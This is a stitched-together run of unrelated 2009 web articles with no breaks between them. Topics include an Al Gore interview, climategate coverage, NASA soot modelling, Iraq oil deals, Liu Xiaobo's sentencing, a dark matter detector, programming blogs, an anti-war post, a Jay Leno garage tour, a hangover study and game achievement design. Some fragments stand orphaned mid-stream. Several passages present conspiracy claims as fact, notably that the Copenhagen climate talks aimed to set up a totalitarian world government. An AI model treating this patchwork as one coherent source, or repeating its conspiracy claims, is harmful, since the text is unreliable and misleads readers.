Gore is particularly compelling on psychology : his book addresses head - on the fact that merely repeating grave pronouncements about the climate crisis is n't a remotely effective way to get governments or individuals to act .
Instead , he explores ways to link long - term environmental goals to everyday incentives that people and businesses can actually get their heads around , most obviously by putting a price on carbon via cap - and - trade and other mechanisms : " If the only tool we use to analyse what 's valuable is a price tag , then those things that do n't have price tags begin to look like they have no value , " he writes .
He 's also passionate about the potential psychological impact of Dscovr , the Nasa satellite project he proposed while serving as Bill Clinton 's vice - president ( which Dick Cheney mothballed , and Obama has resurrected ) .
Among other things , it would provide a continuous view of the sunlit side of the Earth , available via the internet – a sort of real - time version of the famous Earthrise photograph , serving as a constant reminder and update on the fragile state of our planet .
But it is , naturally , the state of Gore 's personal psychology that interests people just as much .
Everyone has their hypotheses .
They want to know if his environmental campaigning has somehow brought him peace , after the almost unimaginable disappointment of the 2000 election .
Or they speculate that he feels guilty for not focusing sufficiently on the climate during that campaign , and is making up for lost time , or guilty for not fighting harder over Florida , given all that subsequently happened under Bush .
Our Choice , like An Inconvenient Truth , declares that we are at a historic decision point , at which we can choose to hesitate , with disastrous consequences , or to rise to the occasion – which is virtually an invitation to engage in armchair psychoanalysis .
Did n't Gore himself blink , at an analogous crucial moment , with momentous results for himself , and the world ?
In the years immediately following the disputed presidential election – after growing a beard and gaining weight – Gore drew on deadpan humour to help process the experience , and to put audiences at their ease .
" You win some , you lose some , and then there 's that little - known third category , " he would say .
Or : " I do n't want you to think I lie awake at night , counting and recounting sheep . "
But these days the gags have subsided .
" To place the disappointment , which I felt keenly , into some perspective , there are millions upon millions of people who have suffered infinitely larger losses than I suffered , " he says now .
" They move on with their lives , and if they can , I certainly can .
If we walked through the lobby of this hotel and down the sidewalk outside , we 'd run into a lot of people who , without us knowing it , are carrying enormous burdens of loss and disappointment .
It 's part of the human condition . "
It does seem , though , as if taking on the biggest conceivable global challenge has helped heal the wound , and perhaps even provided him with a satisfaction that being vice - president did n't .
" It 's a blessing to have work that feels fulfilling , " he says .
" There 's a passage in the Bible – not that I wear religion on my sleeve ; I do not – but there 's a passage that 's long had meaning for me : ' Whatsoever thy hand findeth to do , do it with thy might ' ...
There 's that wonderful old English movie , Chariots Of Fire , when the runner says at one point , ' When I run , I feel God 's pleasure . '
He was expressing a universal human emotion that I think is applicable . "
It is easy to forget exactly how unlikely it is that Gore should be doing anything , at this point , other than serving as an elected politician .
The son of the Tennessee senator Albert Gore , he was born in Washington DC and grew up immersed in politics ; by the time he went to Harvard , he 'd gone public with his ambition to become president .
He met his future wife , Tipper , at his high school prom in 1965 , and served in Vietnam as an army journalist , despite opposing the war ; by 1977 he was a Congressman , aged 29 .
He upgraded to the Senate in 1985 , where he played a key role in securing funding for the nascent internet – even if he did n't quite invent it , as some critics falsely alleged that he 'd claimed – and ran unsuccessfully to be the Democrats ' presidential nominee in the 1988 election .
In 1989 , his son Albert , then six , was hit by a car while crossing the road and nearly died :
Gore said the experience transformed him , and put him off running for president ; instead , he joined Clinton 's ticket in 1992 .
During 2007 and 2008 , it was frequently suggested that he should run again – indeed , that he had a moral duty to run again – and he never quite fully dismissed the notion until he endorsed Obama .
More than any other living figure on the US national stage , perhaps , Capitol Hill and the White House have dominated his life .
And yet here he is , aged 61 , living in Nashville , in an 18 - room mansion that has been retrofitted to rely entirely on renewable energy , shuttling across the globe , positioning himself cleverly both as the ultimate insider and an activist willing to go far further than the insiders would dare .
He serves as an adviser to Google , as well as an Apple board member , chairs a sustainable investment fund , and is a partner in Kleiner Perkins Caufield & Byers , a venture capital fund with environmental interests .
( He is , as a result , often accused of a conflict of interest , but responds that all his profits go to his nonprofit organisation , the Alliance for Climate Protection . )
" He 's got access to every leader in every country , the business community , people of every political stripe , " Tipper Gore told Time magazine .
" He can do this his way , all over the world , for as long as he wants .
That 's freedom .
Why would anyone give that up ? "
Contrary to the general consensus among activists and journalists , Gore remains optimistic about the Copenhagen talks in December – optimistic that the US Senate will pass a bill to clarify Washington 's position , arming Obama with much - needed moral authority , and thus optimistic that a worthwhile agreement , which hinges on a US commitment , will emerge from the gathering itself .
" I was in China two days ago , and the premier of China asked me , in essence , why I 'm optimistic that the Senate will pass legislation when the conventional wisdom says otherwise .
And the answer is that I have been a part of conversations between Democrats and Republicans that give me a very different view from what the consensus is in the journalistic community . "
He refers to the op-ed by South Carolina Republican Lindsey Graham and Massachusetts Democrat John Kerry in the New York Times , calling for legislation to pass .
" There are other surprises like that in store . "
Of the potential Copenhagen deal , Gore says , " I expect it to be far weaker than the one I would like to see .
However , the important achievement [ will be ] to put a price on carbon , and reset expectations among business , government , NGOs and others . "
He likens the situation to the Montreal Protocol on the ozone layer .
" The world acted fairly quickly , but the agreement they reached was criticised for being insufficient . "
Yet , he points out , when the treaty was revised , " many of the businesses that had opposed [ it ] were there to argue in favour of toughening it significantly .
Because once they began to comply ... they realised that it was not as difficult as they had feared .
And once they 'd made the commitment to the change , they were eager to get on with it . "
It made more sense , financially and in PR terms , to go all the way instead of halfway .
Is it important for Obama to go to Copenhagen himself ?
" Oh yes .
And I expect that he will .
He has n't told me that he will , and no one representing him has told me that he will .
But I feel certain that he will . "
In Gore 's position , of course , optimism infused with urgency is the only rational stance to take in public .
Unless you either do n't believe in human - caused global warming , or you think it 's definitely too late to do anything about it , there 's no real upside to saying anything other than that the situation is grave yet addressable .
But Gore , you get the feeling , really is an optimist , all the way through .
His repeated references to JFK 's promise to put a man on the moon may not , as a climate change analogy , bear close scrutiny : putting a man on the moon did n't require the average American to do anything at all .
Still , the crisis needs its Kennedy , and Gore – for all his improbable , un -Kennedy - like brand of charisma – seems to be that man .
" We have a tendency as human beings to confuse the unprecedented with the improbable , " he says .
" If something has never happened before , we tend to assume it will not happen in the future ... [ but ] throughout history , there have been examples of human societies confronting dire threats , and finding , in their response , that they were capable of more than they thought they were capable of . "
What everything depends on now , he says , is " how soon we reach a critical mass of political awareness that can ... give us the ability to use the rule of law as an instrument of human redemption . "
We will win or we will lose : outside of dodgy Floridian elections , there actually is n't a third category .
• Our Choice : A Plan To Solve The Climate Crisis , by Al Gore , is published by Bloomsbury at £ 14.99 .
To order a copy for £ 13.99 ( including UK mainland p&p ) , go to theguardian.com / bookshop or call 0330 333 6846 .
Paul Joseph Watson
Prison Planet.com
Thursday , December 3 , 2009
Representative Candice Miller has called for a Congressional investigation into the climategate scandal , saying that the deliberate destruction of data by scientists intimately involved in the UN IPCC in order to avoid FOIA requests was a “ criminal act ” and blows away the whole foundation for the cap and trade legislation .
Miller made the case that climategate completely undermines the cap and trade legislation passed by Congress earlier this year , which would lead to massive outsourcing of jobs , redistribution of wealth to other countries as well as devastating the economy and states that rely on coal for electricity production , such as Michigan , for whom Miller is a representative .
“ If cap and trade were to pass , Michigan ’s economy would be devastated , but we were told that it had to happen because the alternative is worse , ” said Miller , before discussing climategate , noting that the content of the leaked emails has “ blown away the scientific foundation for the man - made global warming theory . ”
“ These troubling emails show that some of the most respected and quoted and published scientists have used “ tricks ” to manipulate data , refused to release the data that is the foundation for their research , and they ’ve attempted to silence any critics of their hypothesis , and even expressed dismay that they could not explain recent cooling taking place across the globe , ” said Miller .
[ efoods ]
Miller then quoted the most infamous emails including Phil Jones ’ “ hide the decline ” passage and Kevin Trenberth ’s email , where he states , “ The fact is that we ca n’t account for the lack of warming at the moment and it is a travesty that we can ’t . ”
Trenberth was a lead author of the 1995 , 2001 , and 2007 IPCC Scientific Assessment of Climate Change .
“ An inconvenient truth that temperatures were declining required a “ trick ” to hide it , ” noted Miller .
Speaking on the subject of how the emails expose how warmist scientists engaged in academic witch hunts to prevent studies they disagreed with from appearing in peer - reviewed journals , Miller summarized ;
“ Call those who disagree with their hypothesis “ cranks ” because they have not been published in peer - reviewed journals and then when they are – to discredit the journal – in other words Mr. Speaker – the fix is in . ”
Miller then highlighted the deliberate destruction of raw climate data on behalf of the CRU scientists and their colleagues .
“ The leader of the CRU for years refused to release source data and now they claim that the data was lost – you know it sounds to me like the old elementary excuse – ‘ the dog ate my homework ’ – that excuse did n’t work for 3rd graders and it ’s certainly unacceptable for scientists who are asking us to totally upend our economy , ” said Miller .
Speaking on the subject of data that was deliberately destroyed in order to avoid Freedom of Information Act requests , Miller stated , “ that is not just bad science , that is a criminal act . ”
“ Congress needs to hold hearings to this matter , we need to investigate these very troubling revelations – if we are to make policy that will profoundly impact our nation , that policy must be made on facts , not on articles of faith or manipulated data , ” concluded Miller .
Watch the video of Miller ’s speech below , followed by Senator Inhofe ’s comments on climategate made yesterday .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
× This page contains archived content and is no longer being updated .
At the time of publication , it represented the best available science .
On the Tibetan Plateau , temperatures are rising and glaciers are melting faster than climate scientists would expect based on global warming alone .
A recent study of ice cores from five Tibetan glaciers by NASA and Chinese scientists confirmed the likely culprit : rapid increases in black soot concentrations since the 1990s , mostly from air pollution sources over Asia , especially the Indian subcontinent .
Soot - darkened snow and glaciers absorb sunlight , which hastens melting , adding to the impact of global warming .
NASA climate scientists combine satellite and ground - based observations of soot and other particles in the air with weather and air chemistry models to study how the atmosphere moves pollution from one place to another .
This image is from a computer simulation of the spread of black soot ( “ black carbon ” to climate scientists ) over the Tibetan Plateau from August through November 2009 .
It shows black carbon aerosol optical thickness on September 26 , 2009 .
( Aerosol optical thickness is scale that describes how much pollution was in the air based on how much of the incoming sunlight the particles absorbed . )
Places where the air was thick with soot are white , while lower concentrations are transparent purple .
The highest concentrations of black soot are in the right - hand side of the image , over the densely populated coastal plain of China .
But high concentrations occur over India , as well , and the black soot spreads across the southern arc of the Tibetan Plateau , which is defined by the towering peaks of the Himalaya Mountains .
( Note : Topography has been exaggerated to highlight features that influence air movement ) .
The animation shows how the black carbon pollution from India often circulates at high concentrations for several days against the base of the Himalaya , periodically “ sloshing ” over the rim of the mountains and spilling northward over the plateau , before being carried away over the Bay of Bengal or the Arabian Sea .
Writing about the implications of the study for the Goddard Institute for Space Studies Website , NASA climate scientist and study co-author James Hansen said , “ [ C] ontinued , ‘ business - as - usual ’ emissions of greenhouse gases and black soot will result in the loss of most Himalayan glaciers this century , with devastating effects on fresh water supplies in dry seasons .
The black soot arises especially from diesel engines , coal use without effective scrubbers , and biomass burning , including cook stoves .
Reduction of black soot via cleaner energies would have other benefits for human health and agricultural productivity .
However , survival of the glaciers also requires halting global warming , which depends upon stabilizing and reducing greenhouse gases , especially carbon dioxide . ”
NASA image by Gregory Shirah , Goddard Scientific Visualization Studio , based on model simulations from the Goddard Earth Observing System Model , Version 5 ( GEOS - 5 ) .
Caption by Rebecca Lindsey .
BAGHDAD 
More than six and a half years after the United States - led invasion here that many believed was about oil , the major oil companies are finally gaining access to Iraq ’s petroleum reserves .
But they are doing so at far less advantageous terms than they once envisioned .
The companies seem to have calculated that it is worth their while to accept deals with limited profit opportunities now , in order to cash in on more lucrative development deals in the future , oil industry analysts say .
“ The attraction of these fields to oil companies is not the per - barrel profit , which is very low , but their value as an entrance ticket to the oil sector of southern Iraq , ” said Reidar Visser , a research fellow at the Norwegian Institute of International Affairs who operates an Iraq Web site , Historiae .
“ In terms of size and potential , the Basra region remains one of the most attractive areas of future growth for the international oil industry . ”
Iraq ’s first stab at opening its oil industry to foreign investment ended in disappointment at an auction in June in which most companies declined to bid .
But last month many of those same companies  including Exxon Mobil and Occidental Petroleum , the first American companies to reach production agreements with Baghdad since the 2003 invasion  signed deals at much the same terms they rejected over the summer .
WASHINGTON -- The U.S. Environmental Protection Agency will early next week , possibly as soon as Monday , officially declare carbon dioxide a public danger , a trigger that could mean regulation for emitters across the economy , according to several people close to the matter .
Such an " endangerment " decision is necessary for the EPA to move ahead early next year with new emission standards for cars .
EPA Administrator Lisa Jackson has said it could also mean large emitters such as power stations , cement kilns , ...
Images from Life Science Library The Physician , 1967 .
This set at hi-res on flickr
BEIJING 
The harsh sentence handed down on Friday to Liu Xiaobo , one of China ’s most prominent campaigners for democracy and human rights , prompted strong rebukes in the United States and Europe , but it also raised fresh questions over whether the West has much leverage over a government that is increasingly self - assured on the world stage .
By sentencing Mr. Liu to 11 years in prison for subversion , the Chinese government sent a chilling message to advocates of political reform and free speech .
Mr. Liu , 53 , a former literature professor who helped draft a manifesto last December that demanded open elections and the rule of law , was convicted after a closed two - hour trial on Wednesday in which his lawyers were allowed less than 20 minutes to state his case .
But many experts on Chinese politics said that Mr. Liu ’s conviction on vague charges of “ incitement to subvert state power ” through his writing was also an unmistakable signal to the West that China would not yield to international pressure when it came to human rights .
During his visit to China last month , President Obama raised Mr. Liu ’s case with President Hu Jintao .
Leaders of the European Union have been pressing for his release .
But a spokesman for China ’s Foreign Ministry described such pressure on Tuesday as “ gross interference in China ’s judicial internal affairs . ”
The next day , more than two dozen American and European diplomats who sought to observe the trial were barred from the courthouse .
That dark matter has never been found is no deterrent to the physicists who are looking for it .
" Even if we do n't know what dark matter is , we know how it must act , " said Eduardo Abancens , a physicist at Spain 's University of Zaragoza and designer of a prototype dark matter detector .
According to physicists , only around five percent of what makes up the universe can presently be detected .
The existence of dark matter is inferred from the behavior of faraway galaxies , which move in ways that can only be explained by a gravitational pull caused by more mass than can be seen .
They estimate dark matter represents around 20 percent of the universe , with the other 75 percent made up of dark energy , a repulsive force that is causing the universe to expand at an ever - quickening pace .
At the heart of Abancens ' team 's detector , which is called a scintillating bolometer and resembles a prop from The Golden Compass , is a crystal so pure it can conduct the energy ostensibly generated when a particle of dark matter strikes the nucleus of one of its atoms .
To prevent interference by cosmic rays , the bolometer is sheathed in lead and kept underground , under half a mile of rock .
It 's also frozen to near - absolute zero , the temperature at which all motion stops .
At the edge of absolute zero , it 's possible to measure expected changes of a few millionths of a degree Fahrenheit .
Researchers like Abancens call this " a high heat signal . "
As described in a paper published in the August Optical Materials and released online Friday , the bolometer is currently able to distinguish between the vibrations produced by trembling nuclei and spinning electrons .
Abancens said it could be operational in five years .
But in order for the bolometer to work reliably , it needs to become even more sensitive , and maintain that sensitivity as it's scaled up from the 46 - gram prototype to a half - ton working model , said Rick Gaitskell , a Brown University physicist who was not involved in the research .
At near - absolute zero , conducting research is " quite challenging , " said Gaitskell , who spent a decade trying to make detection systems work at that temperature .
" Now we 're using using liquid xenon .
It 's relatively warm , only minus 150 degrees Fahrenheit , " he said .
" You can nearly get to that in an industrial - strength refrigerator . "
See Also :
Citation : " A BGO scintillating bolometer as dark matter detector prototype . "
By N. Coron , E. García , J. Gironnet , J. Leblanc , P. de Marcillac , M. Martínez , Y. Ortigoza , A. Ortiz de Solórzano , C. Pobes , J. Puimedón , T. Redon , M.L. Sarsa , L. Torres and J.A. Villar .
Optical Materials * , Vol. 31 Issue 10 , August 2009 .*
Image :
The blue glow comes from the photographer 's flash .
IAS / SINC
Brandon Keim's Twitter stream and reportorial outtakes ; Wired Science on Twitter .
Brandon is currently working on a book about ecosystem and planetary tipping points .
Holiday Fun : How Programming Language Fanboys See Each Others ’ Languages
By Peter Cooper
Overt humor is n't usually Ruby Inside 's thing , but it 's the holiday season , so there 's nothing wrong with kicking up your heels and having a little fun .
Do n't worry - this wo n't become a habit .
Promise !
After the fold , check out a chart showing how programming language fanboys ( Ruby 's included ) see each other 's respective languages .
There 's a higher resolution version available ..
I mentioned several days ago that , according to a recent Pew poll , 44 % of the U.S. public thinks that China is the " world 's leading economic power . "
OK , I can understand why some people might think so -- what with the trillions of dollars of U.S. debt to our Chinese overlords , the ubiquity of " Made in China " products wherever you shop , and the precision and scale of the opening ceremony of the Beijing Olympics .
Still , people who think this are wrong .
When reading the Pew poll , I immediately thought of a scene , from Gansu province , that gives an idea of how hundreds of millions of people get by in today 's " all - conquering " modern China :
And of the view from our apartment window in Beijing a few weeks before the opening of the Olympic games .
The point of this one , of course , is that en route to industrial development , all countries have gone through their blacken - the - skies dirty industry stage .
That is where China is now , though with serious efforts to get out of it :
For readers in China , let me be 100 % explicit and clear that the point is not to put down China 's people or its system for the things the country has not yet achieved and the gaps not yet closed .
Those achievements are phenomenal .
But some people outside China have evidently developed a wholly unrealistic , fantasy - world concept of a China that has no remaining problems and is surging effortlessly ahead .
A more realistic view -- of a country that is advancing dramatically , but from a very low level of average wealth -- is better for all concerned .
Posted by John , December 2nd , 2009 - under Imperialism , United States , US foreign policy , US imperialism , US politics .
Tags : Afghanistan , Barack Obama
All the old Bush lies were there .
According to Barack Obama , invading Afghanistan was and is about stopping terrorism .
It was and is about preventing more September 11s .
It was and is about stopping the Taliban .
It was and is about stopping new attacks on the United States .
None of this is true .
All Obama has done is repeat the lies of Bush to justify doubling the number of American troops in Afghanistan ( 30,000 this time and the 21,00 earlier this year . )
And his praise for the warlord government of Hamid Karzai was sickening .
That corrupt cabal used massive fraud to win the recent election .
That does n’t matter to Obama .
What matters is a subservient pro-US regime as part of the imperialist competition with China and the need to rule the world .
Afghanistan is now Obama ’s war .
And the troop surge will drag Pakistan further into the quagmire of defeat and spread the resistance .
All of this , and wrapping himself in the grotesque nationalism of the American ruling class , shows that Obama is not only continuing Bush ’s imperialist project in Afghanistan ; he is accelerating it .
The idea that the Afghan puppets will be able to take over responsibility for defeating the resistance when the US can’t do that is laughable .
Obama ’s pledge to bring the extra troops home starting in 18 months time is an outrageous lie or an admission already of defeat .
Time will show us which but to me it has the smell of withdrawal in the face of the overwhelming opposition from the Afghan people .
The 100,000 NATO and Western troops wo n’t win .
The invasion created the resistance .
More troops means more resistance .
Millions of Americans voted for change .
They did n’t expect Obama to be to the right of Bush on foreign wars .
His announcement last night to further increase Americans troops in Afghanistan shows he is .
The logic of US imperialism is expansionist and militaristic .
As Thomas Friedman ( one of the most influential journalists in the US ) wrote some years ago in his book The Lexus and the Olive Tree :
The hidden hand of the market will never work without a hidden fist .
McDonald ’s cannot flourish without McDonnell Douglas , the designer of the U.S. Air Force F - 15 .
And the hidden fist that keeps the world safe for Silicon Valley ’s technologies to flourish is called the U.S. Army , Air Force , Navy and Marine Corps .
It is the logic of American capitalism that mandates it bend the rest of the world to the wants and needs of its capital accumulation process , and in many cases subjugate nations and peoples .
In today ’s world , the main threat to US imperialism is the developing strength of Chinese imperialism .
All the actions of the US ruling class have to be seen in that light , including the invasion of Afghanistan which gave the US a beachhead into Central Asia and is part of the ongoing encirclement of China .
Democrat presidents over forty years ago thought that increasing troop numbers in Vietnam would stop the spread of ‘ communist ’ ( that is Stalinist ) influence .
They too thought that war was winnable .
50,000 dead Americans and perhaps 2 million Vietnamese showed they were wrong .
That is the fate that awaits US imperialism in Afghanistan .
The left in the United States has an historic opportunity and duty to rebuild the anti-war movement and force their murdering leaders out of Afghanistan .
Readers might also like to look at Afghanistan : the death knell for Obama ’s presidency ?
Large Problems in Django , Mostly Solved : Search ¶
It ’s been a little over a year since I started doing Django development full - time , for one of them real jobs .
Around that time , there were a few large problems in the community that had n’t been solved yet .
They were kind of blemishes when you would talk to people about Django , and I ’m happy that most of them have been solved .
This will be a series of posts that talk about the different big problems that have been solved , and how they have been addressed in the community .
Copenhagen , a $ 30 billion dollar “ success ” ?
A funny thing happened this week .
Humanity did a low - orbit bypass of a totalitarian world government , and pulled away , but only a few noticed the near miss .
Christopher Monckton has already spoken about the draft treaty with it ’s message of setting up a new form of global governance , but without any mention of voting .
He spoke again yesterday to Alex Jones and pointed out that in a sense Copenhagen succeeded , despite what everyone is saying .
After all , it was never really about saving the environment was it ?
It was about setting up a world government , and they got the odd $ 30 billion dollars .
Not bad for a failure .
“ That is the one thing that they are definitely going to succeed in doing here and they will announce that as a victory in itself , and they will be right because that is the one and only single aim of this entire global warming conference , to establish the mechanism , the structure , and above all the funding for a world government . ” the British politician , business consultant , policy adviser exclusively told the Alex Jones show yesterday ”
“ They are going to take from the western countries the very large financial resources required to do that . ”
Monckton said , adding “ They will disguise it by saying they are setting up a $ 100 billion fund for adaptation to climate change in third world countries , but actually , this money will almost all be gobbled up by the international bureaucracy . ”
“ The first thing they will do , and the one thing I think they were always going to succeed in doing at this conference is to agree to establish what will be delicately called ‘ the institutional framework ’ .
Now that is a code word for world government . ”
Big-Government grows one law at a time
When I talk to people about the insidious reach of big government one example I ’ve been using lately is that of The Netherlands .
In the name of “ carbon - pollution ” the government of the Netherlands wants to have a GPS in every car in order to charge people for their CO2 emissions .
Each GPS will track where and when every car moves , radio the data in and an audit office will calculate CO2 emissions based on kilometers driven and the car model .
They will also know exactly where people go and how long they stay there for , 24 hours a day .
[ Source ]
But there is a better more efficient system for taxing carbon emissions , and with the exquisite sensitivity of being directly connected to the exact amount emitted , Governments could just tax … fuel ( and it ’s not like they have n’t thought of that already ) .
There is no need for major audits , amassed records , or an invasion of privacy .
Plus it ’s virtually impossible to cheat .
In many ways the GPS solution would be worse for the environment .
It would let a poorly maintained car get away with increased emissions without an extra penalty because they would be charged for the average emissions for that car model .
Likewise there would n’t be as much incentive to pump up your tyres and tune that motor , because if your car was better than average , you do n’t save much money , even though you save emissions .
It ’s too bizarre for words .
Yet apparently other state departments ( like Oregon ) have considered the same thing .
The amount of data that would “ need ” to be maintained and managed is boggling .
And the security would be a headache and a half .
( Just think how handy it would be to track all your competitors car movements , or your ex-wife ’s , or your employees .
Just think how many people would like to track you too ?
Hackers would come , and then they ’d know where you went too … )
Is there any limit to how large and powerful the reach of any government aims to be ?
VN : F [ 1.9.22_1171 ]
please wait ...
Rating : 10.0/10 ( 1 vote cast )
We were lucky enough to snag a tour of Jay Leno 's Big Dog Garage during the LA Auto Show .
Supercars galore ?
Sure , but you know what ?
We want the Tatra .
And the motorcycles .
And the ... oh hell , we want it all .
Advertisement
A random list of the things you will see in the gallery below :
Jay Leno
A wall of Vincent motorcycles
Some of the best garage art known to man
Mercedes - Benz PR man Geoff Day , a.k.a.
Pressing the Light Fantastic
A fully operational Tatra T87
A very large steam engine that A ) used to belong to Thomas Edison and B ) works
Journalist extraordinaire Bengt Halvorson ( Hi Bengt ! ) next to a Ford Shogun
A water - jet cutter
A rear - wheel - drive Oldsmobile Toronado
Ordinary , run - of - the - mill stuff like a McLaren F1 .
Frankly , it was amazing .
The cars and bikes are exactly as we'd have them — running condition , nice without being too nice , and correctly restored ( or at least sympathetically screwed with in the name of speed ) .
The collection of art and assembled mobilia — the larger pieces were painted by NBC 's set department — is simply astonishing .
The restoration and service shop is complete enough to make your toes curl .
And in the middle of it all is an ordinary , down - to - earth machine nut who just happens to be one of the most famous men in the world .
Advertisement
The man may not be considered the king of late night anymore , but he sure knows how to collect cars .
( Photo Credits : Greg Jarem / Mercedes - Benz / Jalopnik )
The fermenting process that transforms corn and other grains into bourbon , and converts potatoes , grains — and increasingly grapes and other elements — into vodka , not only produces alcohol , but also byproducts known as congeners .
And , according to research to be published next March in the journal Alcoholism : Clinical and Experimental Research , the concentration of congeners , which can be toxic in large amounts , may impact just how terribly you feel the morning after drinking a particular liquor .
Researchers from the Boston University School of Public Health and the University of Michigan Medical School put some science behind what many holiday revelers have long suspected — if sleep and total alcohol consumption are the same , because of its higher concentration of congeners , bourbon gives you a far worse hangover than vodka .
Bourbon , the researchers found , has 37 times the amount of congeners that vodka does , leading researchers to believe that it would cause more painful hangovers .
To test this theory , they recruited — and paid — 95 men and women to go out drinking .
After an initial night of acclimatization , study participants were given drinks containing either bourbon or vodka , and kept swilling away until they reached a blood alcohol content level of .11 ( the legal limit is .08 ) .
The following night , participants drank the same amount , but of a placebo , or non-alcoholic concoction .
Researchers found that , no matter your poison , drinking to a blood alcohol content level of .11 impedes performance the following day .
Yet , what was interesting , they said , was that when they tested people after their blood alcohol content had returned to 0.0 the following day , even though bourbon drinkers still felt a whole lot worse , both they and vodka drinkers had the same level of impairment on tasks .
When Diane Lyons of Carrollton , Ohio , caught her 6 - year - old daughter shoplifting a $ 3.11 pack of tattoo stickers , she did what any mother would do .
She called police , who took little Shiane away .
Lyons then asked about collecting a $ 30 reward for turning in shoplifters , the Associated Press tells us .
" I do n't think I went too far , " Lyons , 31 , said in a phone interview .
" You 've got to catch them when they first start if they do something wrong . "
AP says Police Chief Ronald Yeager went to the Discount Drug Mart last week and took the girl to the station before releasing her to her mother .
And the reward ?
Lyons did n't follow up because she felt bad about asking for it .
" People think that I set her up or something to get the reward , " Lyons said .
She does n't believe she overreacted ; she just wanted to teach her daughter a lesson .
" I do n't think Shiane would do it again , I really do n't , because of all that I did , " Lyons said .
( Posted by Michael Winter )
" I was very relieved to find out my condition was not psychological , " she said .
" For a while I thought I was going crazy or that it was somehow my fault .
From Slate :
The issue has been festering for months ...
A new report issued by Special Inspector General Neil Barofsky now reveals that government officials , notably then - New York Fed President and current Treasury Secretary Timothy Geithner , grievously damaged the nation and capitulated to the very banks they should have been supervising .
Barofsky 's report reads like a case study in failed negotiation .
The New York Fed did n't have the backbone to stand up to Wall Street , did n't understand its capacity to protect taxpayers , and did n't appreciate that its responsibility was to taxpayers .
Geithner and the Fed have proffered a series of spurious reasons for their willingness to pay AIG 's counterparties — the leading Wall Street banks — in full while demanding concessions from every other entity with whom the Treasury or the Fed dealt .
Geithner suggested he could not use the threat of AIG 's default in the absence of a federal bailout to get concessions from AIG 's creditors .
Why not ?
Keep reading at Slate >
The following blog post , unless otherwise noted , was written by a member of Gamasutras community .
The thoughts and opinions expressed are those of the writer and not Gamasutra or its parent company .
I have a confession — I used to hate achievements .
It started with Xbox Live , and I was pretty sure that I was the only one .
It was hard for me to articulate why exactly I disliked them so much — so many of them were just , well , bad .
Let 's toss our nostalgia aside for a moment and recognize that game design has come a long way over the past couple of decades .
I loved the original Zelda , but no one is going to convince me that the process of uncovering secrets by methodically burning every single bush across dozens of screens was good game design .
We 've learned a lot about what works and what does n't .
We 've refined and polished concepts and gameplay mechanics .
Why , then , did we throw everything we 'd learned out the window when it came time to design achievements ?
I think that 's what bothered me about early Xbox Live achievements more than anything — as goals , they violated too many game design guidelines .
Too many of them would n't make any sense as in - game goals for progressing through content .
In June of 2007 , I was tasked with creating site - wide achievements in user - submitted Flash games on Kongregate .
I was forced to ask myself , " If I hate common achievement design so much , how would I do it ? "
I 've spent the past 2 1 / 2 years designing , testing , naming , and releasing over 800 achievements across hundreds of Flash games .
I 've obsessed over earning distribution data , game comments , forum posts , direct user feedback , and changes in game ratings far more than I 've let on to Kongregate 's often critical community ( ca n't give 'em the satisfaction ! ) .
I 've made ( and continue to make ) plenty of mistakes , but I 've also learned a lot of lessons .
It 's also worth noting that I have been obsessed with World of Warcraft 's achievement system over the past year , the design / implementation of which has really blown me away in terms of thoughtfulness and overall user experience , even if it's had a few blunders — mostly related to highly random , time - sensitive achievements tied to a meta - achievement with an enticing in - game reward .
I 'd like to take some time to share the lessons I ’ve learned with all the game designers out there who are now adding achievements into their games — whether they be on Xbox 360 , PS3 , Steam , a Flash game , or an MMO .
These points are given with the assumption that the player is at least somewhat engaged in your achievement system .
If he 's not , well , how you create achievements in the first place is a moot point anyway !
1 . Why is this hard , and is that reason fun ?
Ridiculously hard achievements are okay , if they 're hard for the right reasons .
In middle school , I was completely glued to Golden Eye 007 until I unlocked every damn cheat code , with the Silver PP7 in particular taking up 4 hours of a Saturday on its own .
When I finally succeeded , it was one of the most rewarding experiences of my life ( I have n't exactly climbed Mt. Everest here ) .
Here are some good reasons for achievements to be hard : high skill component , perfection of a core game mechanic , and handicapping the player if the new core mechanic of this handicap is still compelling ( such as removing high - powered weapons when the low - powered ones are just as much fun ) .
Here are some bad reasons for achievements to be hard : low skill component ( luck - based ) , perfection of non-central game mechanic that is n't overly fun on its own , handicapping the player by removing a fun element of core gameplay , excessively grindy , severe punishments for small mistakes after a long period of time , aggressive real - life demands ( completing a grueling task within 24 real - time hours , for example ) , difficult logistics of even attempting a task ( such as finding an active multiplayer game ) , and high reliance on specific behavior of opponents ( especially in a multiplayer setting ) .
Something I quickly learned when designing achievements on Kongregate is that the more difficult the achievement is to earn , the more difficult it is for me to design it well .
Because , well , look at the bad reasons above — it 's like a damn minefield !
Return to these two questions whenever designing difficult achievements : " Why is this hard ?
Is that reason fun ? "
2. Grindy achievements are fine only if they overlap with something that the player would naturally do anyway .
" Grindy " achievements are defined as achievements in which the task is to perform the same action repeatedly , with little or no variance between each repetition .
" 1000 kills , " " $ 100,000 earned , " etc .
They 're extremely prevalent in achievement design because they 're incredibly easy to come up with ( none of that troublesome creativity ) , and they seem like a pretty harmless way to reward the player for playing a game a lot .
The problem with grindy achievements is that game designers will often underestimate how much brain - liquefying drudgery players will subject themselves to just to earn these achievements — it 's often a negative experience for the player , and it makes the achievement system as a whole less fun .
Assign these achievements to stuff that the player is doing anyway , or at least something that the player would n't mind doing a bit more of .
Grindy achievements are usually fine in multiplayer games because there 's essentially no limit to how much a player will enjoy playing a fun game online , as any Counter - Strike addict can attest .
In MMOs , grinding is generally an accepted aspect of the actual game design ( though even WoW removes its most insane grinding task , aptly titled " Insane in the Membrane , " from its core achievement system ) .
Additionally , MMOs get a bit of a free pass because their success is highly reliant on making the player feel immersed in the game world , which is aided by the quantity of time spent playing .
Games that do n't rely on long - term player immersion do n't really benefit from subjecting the player to copious grinding .
When I purchased Ecco the Dolphin over Xbox Live Arcade , I was somewhat baffled to see an achievement for completing the game 3 times .
I 'm not sure what the point of this is .
The game does n't change , and that 's not really natural behavior — I was hoping to run through the game , relive a bit of nostalgia , then move on to something else .
It never crossed my mind that I would repeat this process twice more for an achievement , after the game had already gotten my money .
In general , before implementing grindy achievements , ask if completing that task without the assigned achievement would be considered normal behavior .
If it 's not , the player has to change his behavior .
When achievements cause players to change their behavior , the designers should ask themselves whether this change is leading to a better experience for the player .
With the case of excessively grindy tasks , the answer is almost always " no . "
3 . Creating multiplayer achievements is like playing with fire ; they influence player behavior in sometimes dangerous ways .
I once set out to earn the " Battlemaster " title in WoW , an honor bestowed upon those who complete a series of PvP - related achievements .
